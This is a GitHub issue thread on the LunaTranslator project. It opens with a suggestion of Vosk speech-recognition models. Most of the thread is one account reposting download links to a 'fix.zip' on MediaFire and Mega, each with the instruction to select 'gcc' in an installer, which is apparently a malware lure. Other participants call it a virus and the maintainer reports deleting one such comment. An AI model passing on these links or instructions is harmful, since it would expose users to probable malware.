### ISSUE TITLE
I don't know Maybe you will need some of these models link below  

### ISSUE THREAD

**Issue by gqwg2003** [HIllya51/LunaTranslator#1026]
### Expected behavior 预期的功能

warning before clicking on a link check it for safety    for all links below

https://alphacephei.com/vosk/models

Supports 20+ languages and dialects - English, Indian English, German, French, Spanish, Portuguese, Chinese, Russian, Turkish, Vietnamese, Italian, Dutch, Catalan, Arabic, Greek, Farsi, Filipino, Ukrainian, Kazakh, Swedish, Japanese, Esperanto, Hindi, Czech, Polish, Uzbek, Korean, Breton, Gujarati, Tajik. More to come. 

### Alternative behavior (optional) 近似的功能（可选）

I don't know why I'm giving you a link to this, maybe it will be useful to you   and thanks for reading about

**Comment by darkstorm4hack** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by gqwg2003** [comment]
> Скачать https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file В меню установщика выберите "gcc".

it's most likely some kind of virus

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by gqwg2003** [comment]
> В меню установщика выберите "gcc".



> Скачать https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU В меню установщика выберите "gcc".

make a text document with a description and then I'll take a look

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by gqwg2003** [comment]
> Скачать https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU В меню установщика выберите "gcc".

I took screenshots and posted them here I don't trust your links I only trust verified sources

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by HIllya51** [comment]
`Vosk is a speech recognition toolkit`

**Comment by HIllya51** [comment]
I deleted the comment that maybe could spread the virus.
